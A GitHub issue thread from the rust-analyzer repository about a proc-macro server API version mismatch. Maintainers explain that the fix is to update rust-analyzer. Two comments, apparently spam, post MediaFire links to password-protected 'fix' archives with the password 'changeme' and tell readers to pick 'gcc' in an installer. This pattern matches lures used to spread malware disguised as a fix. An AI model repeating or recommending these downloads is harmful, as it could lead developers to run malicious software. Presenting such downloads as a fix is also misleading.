### ISSUE TITLE
proc macro server's version mismatch

### ISSUE THREAD

**Issue by supernovahs** [rust-lang/rust-analyzer#17976]
2024-08-27T15:09:29.374947Z ERROR rust_analyzer::reload: Failed to run proc-macro server from path /Users/supernovahs/.rustup/toolchains/nightly-aarch64-apple-darwin/libexec/rust-analyzer-proc-macro-srv, error: Custom { kind: Other, error: "proc-macro server's api version (5) is newer than rust-analyzer's (4)" }

version rustc 1.82.0-nightly (515395af0 2024-08-26)

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by lnicola** [comment]
You probably need a newer version of r-a.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aramrw** [comment]
I am having the same problem with `thiserror` but I just ran rustup update 🤔 
**`stable-x86_64-pc-windows-msvc unchanged - rustc 1.80.1 (3f5fd8dd4 2024-08-06)`**

**Comment by Veykril** [comment]
You need to update rust-analyzer, not your toolchain. Either way the cause for this error is an outdated rust-analyzer for the running toolchain
